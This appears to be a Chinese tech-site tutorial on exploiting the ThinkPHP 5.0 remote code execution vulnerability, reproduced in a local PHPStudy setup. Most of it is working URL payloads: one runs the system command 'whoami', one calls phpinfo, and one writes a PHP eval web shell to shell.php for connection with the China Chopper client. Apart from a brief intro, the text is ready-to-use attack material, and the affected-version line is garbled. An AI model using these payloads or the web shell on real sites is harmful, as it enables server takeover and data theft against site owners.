如何实现ThinkPHP5.0远程代码执行

发布时间:2021-10-18 16:02:32 作者:柒染
来源:亿速云 阅读:203

本篇文章给大家分享的是有关如何实现ThinkPHP5.0远程代码执行,小编觉得挺实用的,因此分享给大家学习,希望大家阅读完这篇文章后可以有所收获,话不多说,跟着小编一起来看看吧。

ThinkPHP是一款国内流行的开源PHP框架,某些版本可能存在远程代码执行漏洞,攻击者可向缓存文件内写入PHP代码,导致远程代码执行。虽然该漏洞利用需要有几个前提条件,但鉴于国内使用ThinkPHP框架的站点数量之多,该漏洞还是存在一定的影响范围.

受影响的版本包括5.05.1

下载ThinkPHP5.0.22版本源码程序,放在PHPStudy运行目录下并访问

如何实现ThinkPHP5.0远程代码执行

1.将Payload添加进入URL地址后面进行利用

Payload1:system函数远程命令执行

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

如何实现ThinkPHP5.0远程代码执行

Payload2:phpinfo函数查看phpinfo()的信息

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

如何实现ThinkPHP5.0远程代码执行

2.利用Payload写入shell,并使用菜刀进行连接

Payload1:写入shell

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST[cmd]);?^> >shell.php

**注意:**需要对特殊字符使用^转义(cmd环境下转义方式),windows环境的echo命令输出字符串到文档不用引号(单引号、双引号),部分字符url编码不编码都行.

菜刀连接

如何实现ThinkPHP5.0远程代码执行

以上就是如何实现ThinkPHP5.0远程代码执行,小编相信有部分知识点可能是我们日常工作会见到或用到的。希望你能通过这篇文章学到更多知识。更多详情敬请关注亿速云行业资讯频道。

推荐阅读:
  1. ThinkPHP远程代码执行漏洞是什么样的
  2. 怎么实现EXE文件解析远程代码执行漏洞的分析

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

thinkphp

上一篇:php中PbootCMS漏洞审计怎么理解

下一篇:如何进行tinkphp6.0.7的安装以及thinkphp6.0.0任意文件写入漏洞复现

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》